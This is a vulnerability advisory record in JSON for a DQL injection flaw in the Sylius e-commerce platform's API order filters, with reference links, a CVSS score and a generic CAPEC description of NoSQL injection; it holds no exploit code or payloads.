"id": "GHSA-xcwx-r2gw-w93m",
"modified": "2026-03-11T20:33:18Z",
"published": "2026-03-11T00:13:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Sylius/Sylius/security/advisories/GHSA-xcwx-r2gw-w93m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31825"
},
{
"type": "PACKAGE",
"url": "https://github.com/Sylius/Sylius"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Sylius has a DQL Injection via API Order Filters"
}
No mitigation information available for this CWE.
CAPEC-676: NoSQL Injection
An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code.